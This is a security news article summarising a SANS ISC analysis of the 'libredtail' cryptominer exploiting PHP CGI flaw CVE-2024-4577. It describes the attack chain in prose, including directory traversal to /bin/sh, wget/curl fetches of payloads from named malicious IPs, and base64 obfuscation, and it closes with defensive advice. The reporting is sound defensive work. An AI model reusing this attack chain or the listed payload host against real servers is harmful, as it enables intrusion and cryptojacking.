Libredtail Cryptominer Spreads via HTTP, Exploiting PHP CGI Vulnerability
A new variant of the Redtail cryptominer, dubbed 'libredtail,' is actively spreading via HTTP by exploiting CVE-2024-4577 to compromise PHP servers and deploy cryptocurrency mining payloads.
A guest diary published by the SANS Internet Storm Center (ISC) has detailed a new variant of the Redtail cryptominer, dubbed 'libredtail,' that is actively spreading via HTTP rather than the traditional SSH or Telnet vectors. The analysis, conducted by ISC intern James Roberts using a DShield honeypot, reveals that attackers are exploiting a known PHP CGI vulnerability (CVE-2024-4577) to gain initial access and deploy cryptocurrency mining payloads.
The attack chain begins with a series of HTTP POST requests that employ directory traversal to reach /bin/sh, attempting to execute commands on the target server. The attackers then attempt to download payloads from malicious IP addresses such as 31.57.216.121/sh using wget and curl. The top attacking IPs observed were 82.165.66.87 (Germany), 103.40.61.98 (India), and 2.27.53.96 (UK), all of which also performed SSH brute-force attempts against the honeypot.
A key component of the attack is the exploitation of CVE-2024-4577, a vulnerability in older PHP versions that allows attackers to bypass character encoding protections and inject arbitrary PHP code. The attackers use this flaw to execute commands that download and run a script called 'cve_cve_2024_4577.selfrep_' from the same malicious infrastructure. The payloads are often use base64 encoding to obfuscate their payloads and ensure reliable delivery across different systems.
Once the initial payload is executed, the attackers deploy a script named 'apache.selfrep,' which is designed to maintain persistence on the compromised server. This script ensures that the cryptomining operation continues even after a reboot or service restart. The malware then connects to a command-and-control (C2) server to receive further instructions or download additional modules.
The libredtail variant represents an evolution of the Redtail cryptominer, which was previously observed spreading primarily over SSH and Telnet. By shifting to HTTP-based propagation, the attackers can target a wider range of internet-exposed services, particularly those running vulnerable PHP CGI configurations. This shift also makes detection more challenging, as HTTP traffic is often less scrutinized than SSH or Telnet connections.
Organizations running PHP servers should immediately verify that they are not using vulnerable versions of PHP (specifically those affected by CVE-2024-4577) and apply the necessary patches. Additionally, network defenders should monitor for suspicious HTTP POST requests containing directory traversal patterns or base64-encoded commands, as well as outbound connections to known malicious IPs associated with cryptomining infrastructure.
The SANS ISC has published the full technical analysis in their guest diary, providing indicators of compromise (IOCs) and detailed attack patterns to help defenders identify and block libredtail infections.